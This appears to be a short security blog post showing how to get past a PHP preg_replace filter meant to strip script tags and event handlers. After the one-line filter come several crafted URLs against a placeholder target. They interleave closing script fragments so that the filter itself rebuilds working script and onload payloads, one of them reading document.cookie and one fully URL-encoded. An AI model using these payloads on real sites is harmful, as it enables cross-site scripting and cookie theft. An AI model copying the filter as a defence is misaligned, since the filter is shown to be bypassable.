Bypass 'preg_replace' XSS filter
$message =
preg_replace( ‘/<script[^\>]*>|<\/script>|(onabort|onblur|onchange|onclick|ondbclick|onerror|onfocus|onkeydown|onkeypress|
onkeyup|onload|onmousedown|onmousemove|onmouseout|onmouseover|onmouseup|
onreset|onresize|onselect|onsubmit|onunload)\s*=\s*"[^"]+"/i’, ‘’, $message );
|
http://[target]/xss.php?xss=</script><</script>s</script>c</script>r</script>i</script>p</script>t</script></script>>alert(/xss/)</script></</script>s</script>c</script>r</script>i</script>p</script>t</script></script>> http://[target]/xss.php?xss=</script><</script>s</script>c</script>r</script>i</script>p</script>t</script></script>>alert(document.cookie)</script></</script>s</script>c</script>r</script>i</script>p</script>t</script></script>> http://[target]/xss.php?xss=%3D%3C%2F%73%63%72%69%70%74%3E%3C%3C%2F%73%63%72%69%70%74%3E%73%3C%2F%73%63%72%69%70%74%3E%63%3C%2F%73%63%72%69%70%74%3E%72%3C%2F%73%63%72%69%70%74%3E%69%3C%2F%73%63%72%69%70%74%3E%70%3C%2F%73%63%72%69%70%74%3E%74%3C%2F%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%3C%2F%73%63%72%69%70%74%3E%73%3C%2F%73%63%72%69%70%74%3E%63%3C%2F%73%63%72%69%70%74%3E%72%3C%2F%73%63%72%69%70%74%3E%69%3C%2F%73%63%72%69%70%74%3E%70%3C%2F%73%63%72%69%70%74%3E%74%3C%2F%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E%3E http://[target]/xss.php?xss=</script><</script>b</script>o</script>d</script>y</script> o</script>n</script>l</script>o</script>a</script>d=</script></script>alert</script>(66) </script>/</script>>
|
Comments
Display comments as Linear | Threaded